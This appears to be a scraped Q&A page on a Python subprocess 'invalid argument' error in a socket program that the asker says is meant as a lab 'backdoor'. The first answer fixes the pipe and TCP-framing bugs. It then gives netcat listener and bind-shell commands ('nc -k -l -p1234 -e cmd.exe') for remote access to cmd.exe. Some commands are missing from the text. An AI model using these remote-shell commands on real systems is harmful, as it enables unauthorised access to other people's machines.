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Python Subprocess Stdin.write A String Error 22 Invalid Argument

i have two python files communicating with socket. when i pass the data i took to stdin.write i have error 22 invalid argument. the code a='C:\python27\Tools' proc = subprocess.Pop

Solution 1:

Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:

while True:
    data = s.recv(1024)
    if (data == "") or (data=="quit"): 
    proc.stdin.write('%s\n' % data)
    remainder = proc.communicate()[0]
    print remainder +

The problem is that each time through this list, you're calling proc.communicate(). As the docs explain, this will:

Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.

So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.

If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.

On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.

The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.

But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.

If you look at the source to communicate, you can see how the threading should work.

Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.

On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.

So, you have to implement some kind of protocol that delimits messages in some way.

Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:

while True:
    data = s.recv(1024)

… just do this:

f = s.makefile()
while True:
    data = f.readline()

You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:

with s.makefile() as f:
    for data in f:

One last thing:

OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab

"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.

If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get netcat or apt-get nc. Windows doesn't come with anything, but you can get ports of almost any variant.

A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.

The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.

But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:

nc -l -p1234

Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:


That's it. A lot simpler than writing it in Python.

For the more typical design, the backdoor server on Windows runs this:

nc -k -l -p1234 -e cmd.exe

And then you connect up from Ubuntu with:


Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.

Solution 2:

The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)

And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.

This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:

OSError: [Errno 2] No such file or directory: ''

… which would be much easier to understand.

In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.

It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

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